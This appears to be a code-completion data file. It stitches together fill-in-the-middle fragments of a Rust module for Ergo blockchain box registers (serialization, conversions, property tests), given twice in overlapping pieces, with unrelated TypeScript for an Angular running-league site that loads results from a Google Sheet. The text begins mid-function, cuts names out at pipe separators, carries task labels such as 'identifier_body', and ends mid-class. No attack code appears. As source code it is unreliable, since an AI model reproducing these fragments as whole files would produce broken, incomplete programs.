return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of registers has invalid size (maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
}
}
#[cfg(feature = "json")]
impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
}
| {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
} | identifier_body |
register.rs | //! Box registers
use crate::mir::constant::Constant;
use crate::mir::expr::Expr;
use crate::serialization::sigma_byte_reader::SigmaByteRead;
use crate::serialization::sigma_byte_writer::SigmaByteWrite;
use crate::serialization::SigmaParsingError;
use crate::serialization::SigmaSerializable;
use crate::serialization::SigmaSerializationError;
use crate::serialization::SigmaSerializeResult;
use ergo_chain_types::Base16EncodedBytes;
use std::convert::TryInto;
use std::{collections::HashMap, convert::TryFrom};
use thiserror::Error;
mod id;
pub use id::*;
mod value;
pub use value::*;
/// Stores non-mandatory registers for the box
#[derive(PartialEq, Eq, Debug, Clone)]
#[cfg_attr(feature = "json", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "json",
serde(
into = "HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>",
try_from = "HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>"
)
)]
pub struct NonMandatoryRegisters(Vec<RegisterValue>);
impl NonMandatoryRegisters {
/// Maximum number of non-mandatory registers
pub const MAX_SIZE: usize = NonMandatoryRegisterId::NUM_REGS;
/// Empty non-mandatory registers
pub fn empty() -> NonMandatoryRegisters {
NonMandatoryRegisters(vec![])
}
/// Create new from map
pub fn new(
regs: HashMap<NonMandatoryRegisterId, Constant>,
) -> Result<NonMandatoryRegisters, NonMandatoryRegistersError> {
NonMandatoryRegisters::try_from(
regs.into_iter()
.map(|(k, v)| (k, v.into()))
.collect::<HashMap<NonMandatoryRegisterId, RegisterValue>>(),
)
}
/// Size of non-mandatory registers set
pub fn len(&self) -> usize {
self.0.len()
}
/// Return true if non-mandatory registers set is empty
pub fn | (&self) -> bool {
self.0.is_empty()
}
/// Get register value (returns None, if there is no value for the given register id)
pub fn get(&self, reg_id: NonMandatoryRegisterId) -> Option<&RegisterValue> {
self.0.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
}
/// Get register value as a Constant
/// returns None if there is no value for the given register id, or an error if the value is unparseable
pub fn get_constant(
&self,
reg_id: NonMandatoryRegisterId,
) -> Result<Option<Constant>, RegisterValueError> {
match self
.0
.get(reg_id as usize - NonMandatoryRegisterId::START_INDEX)
{
Some(rv) => match rv.as_constant() {
Ok(c) => Ok(Some(c.clone())),
Err(e) => Err(e),
},
None => Ok(None),
}
}
}
/// Create new from ordered values (first element will be R4, and so on)
impl TryFrom<Vec<RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<RegisterValue>) -> Result<Self, Self::Error> {
if values.len() > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(values.len()))
} else {
Ok(NonMandatoryRegisters(values))
}
}
}
impl TryFrom<Vec<Constant>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(values: Vec<Constant>) -> Result<Self, Self::Error> {
NonMandatoryRegisters::try_from(
values
.into_iter()
.map(RegisterValue::Parsed)
.collect::<Vec<RegisterValue>>(),
)
}
}
impl SigmaSerializable for NonMandatoryRegisters {
fn sigma_serialize<W: SigmaByteWrite>(&self, w: &mut W) -> SigmaSerializeResult {
let regs_num = self.len();
w.put_u8(regs_num as u8)?;
for (idx, reg_value) in self.0.iter().enumerate() {
match reg_value {
RegisterValue::Parsed(c) => c.sigma_serialize(w)?,
RegisterValue::ParsedTupleExpr(t) => t.to_tuple_expr().sigma_serialize(w)?,
RegisterValue::Invalid { bytes, error_msg } => {
let bytes_str = base16::encode_lower(bytes);
return Err(SigmaSerializationError::NotSupported(format!("unparseable register value at {0:?} (parsing error: {error_msg}) cannot be serialized in the stream (writer), because it cannot be parsed later. Register value as base16-encoded bytes: {bytes_str}", NonMandatoryRegisterId::get_by_zero_index(idx))));
}
};
}
Ok(())
}
fn sigma_parse<R: SigmaByteRead>(r: &mut R) -> Result<Self, SigmaParsingError> {
let regs_num = r.get_u8()?;
let mut additional_regs = Vec::with_capacity(regs_num as usize);
for idx in 0..regs_num {
let expr = Expr::sigma_parse(r)?;
let reg_val = match expr {
Expr::Const(c) => RegisterValue::Parsed(c),
Expr::Tuple(t) => {
RegisterValue::ParsedTupleExpr(EvaluatedTuple::new(t).map_err(|e| {
RegisterValueError::UnexpectedRegisterValue(format!(
"error parsing tuple expression from register {0:?}: {e}",
RegisterId::try_from(idx)
))
})?)
}
_ => {
return Err(RegisterValueError::UnexpectedRegisterValue(format!(
"invalid register ({0:?}) value: {expr:?} (expected Constant or Tuple)",
RegisterId::try_from(idx)
))
.into())
}
};
additional_regs.push(reg_val);
}
Ok(additional_regs.try_into()?)
}
}
/// Possible errors when building NonMandatoryRegisters
#[derive(Error, PartialEq, Eq, Clone, Debug)]
pub enum NonMandatoryRegistersError {
/// Set of registers has invalid size (maximum [`NonMandatoryRegisters::MAX_SIZE`])
#[error("invalid non-mandatory registers size ({0})")]
InvalidSize(usize),
/// Set of non-mandatory indexes are not densely packed
#[error("registers are not densely packed (register R{0} is missing)")]
NonDenselyPacked(u8),
}
impl From<NonMandatoryRegisters>
for HashMap<NonMandatoryRegisterId, ergo_chain_types::Base16EncodedBytes>
{
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_value)| {
(
NonMandatoryRegisterId::get_by_zero_index(i),
// no way of returning an error without writing custom JSON serializer
#[allow(clippy::unwrap_used)]
Base16EncodedBytes::new(®_value.sigma_serialize_bytes()),
)
})
.collect()
}
}
impl From<NonMandatoryRegisters> for HashMap<NonMandatoryRegisterId, RegisterValue> {
fn from(v: NonMandatoryRegisters) -> Self {
v.0.into_iter()
.enumerate()
.map(|(i, reg_val)| (NonMandatoryRegisterId::get_by_zero_index(i), reg_val))
.collect()
}
}
impl TryFrom<HashMap<NonMandatoryRegisterId, RegisterValue>> for NonMandatoryRegisters {
type Error = NonMandatoryRegistersError;
fn try_from(
reg_map: HashMap<NonMandatoryRegisterId, RegisterValue>,
) -> Result<Self, Self::Error> {
let regs_num = reg_map.len();
if regs_num > NonMandatoryRegisters::MAX_SIZE {
Err(NonMandatoryRegistersError::InvalidSize(regs_num))
} else {
let mut res: Vec<RegisterValue> = vec![];
NonMandatoryRegisterId::REG_IDS
.iter()
.take(regs_num)
.try_for_each(|reg_id| match reg_map.get(reg_id) {
Some(v) => Ok(res.push(v.clone())),
None => Err(NonMandatoryRegistersError::NonDenselyPacked(*reg_id as u8)),
})?;
Ok(NonMandatoryRegisters(res))
}
}
}
#[cfg(feature = "json")]
impl TryFrom<HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>>
for NonMandatoryRegisters
{
type Error = NonMandatoryRegistersError;
fn try_from(
value: HashMap<NonMandatoryRegisterId, crate::chain::json::ergo_box::ConstantHolder>,
) -> Result<Self, Self::Error> {
let cm: HashMap<NonMandatoryRegisterId, RegisterValue> =
value.into_iter().map(|(k, v)| (k, v.into())).collect();
NonMandatoryRegisters::try_from(cm)
}
}
impl From<NonMandatoryRegistersError> for SigmaParsingError {
fn from(error: NonMandatoryRegistersError) -> Self {
SigmaParsingError::Misc(error.to_string())
}
}
#[allow(clippy::unwrap_used)]
#[cfg(feature = "arbitrary")]
pub(crate) mod arbitrary {
use super::*;
use proptest::{arbitrary::Arbitrary, collection::vec, prelude::*};
#[derive(Default)]
pub struct ArbNonMandatoryRegistersParams {
pub allow_unparseable: bool,
}
impl Arbitrary for NonMandatoryRegisters {
type Parameters = ArbNonMandatoryRegistersParams;
type Strategy = BoxedStrategy<Self>;
fn arbitrary_with(params: Self::Parameters) -> Self::Strategy {
vec(
if params.allow_unparseable {
prop_oneof![
any::<Constant>().prop_map(RegisterValue::Parsed),
vec(any::<u8>(), 0..100).prop_map({
|bytes| RegisterValue::Invalid {
bytes,
error_msg: "unparseable".to_string(),
}
})
]
.boxed()
} else {
any::<Constant>().prop_map(RegisterValue::Parsed).boxed()
},
0..=NonMandatoryRegisterId::NUM_REGS,
)
.prop_map(|reg_values| NonMandatoryRegisters::try_from(reg_values).unwrap())
.boxed()
}
}
}
#[allow(clippy::panic)]
#[allow(clippy::unwrap_used)]
#[allow(clippy::expect_used)]
#[cfg(test)]
mod tests {
use super::*;
use crate::serialization::sigma_serialize_roundtrip;
use proptest::prelude::*;
proptest! {
#[test]
fn hash_map_roundtrip(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
let regs_from_map = NonMandatoryRegisters::try_from(hash_map);
prop_assert![regs_from_map.is_ok()];
prop_assert_eq![regs_from_map.unwrap(), regs];
}
#[test]
fn get(regs in any::<NonMandatoryRegisters>()) {
let hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = regs.clone().into();
hash_map.keys().try_for_each(|reg_id| {
prop_assert_eq![®s.get_constant(*reg_id).unwrap().unwrap(), hash_map.get(reg_id).unwrap().as_constant().unwrap()];
Ok(())
})?;
}
#[test]
fn reg_id_from_byte(reg_id_byte in 0i8..NonMandatoryRegisterId::END_INDEX as i8) {
assert!(RegisterId::try_from(reg_id_byte).is_ok());
}
#[test]
fn ser_roundtrip(regs in any::<NonMandatoryRegisters>()) {
prop_assert_eq![sigma_serialize_roundtrip(®s), regs];
}
}
#[test]
fn test_empty() {
assert!(NonMandatoryRegisters::empty().is_empty());
}
#[test]
fn test_non_densely_packed_error() {
let mut hash_map: HashMap<NonMandatoryRegisterId, RegisterValue> = HashMap::new();
let c: Constant = 1i32.into();
hash_map.insert(NonMandatoryRegisterId::R4, c.clone().into());
// gap, missing R5
hash_map.insert(NonMandatoryRegisterId::R6, c.into());
assert!(NonMandatoryRegisters::try_from(hash_map).is_err());
}
}
| is_empty | identifier_name |
mooseleague_ts.ts |
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
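// Sheet layout sketch (editor's note, inferred from the parsing above; the example values are
// assumptions): each event sheet starts with rows keyed in column A, e.g.
//   Event   | 1 mile,5k
//   Date    | Jun 6
//   Results | <reddit results thread url>
//   Form    | <google form url>
// followed by a "Username" header row and the per-user rows handled in buildUsers().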
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) |
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
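// Scoring summary (editor's note): finishers are ranked by age-graded percent of world
// record; each division's first five finishers score their overall place as points
// (lowest total wins), and divisions with fewer than five finishers are marked DQ.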
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
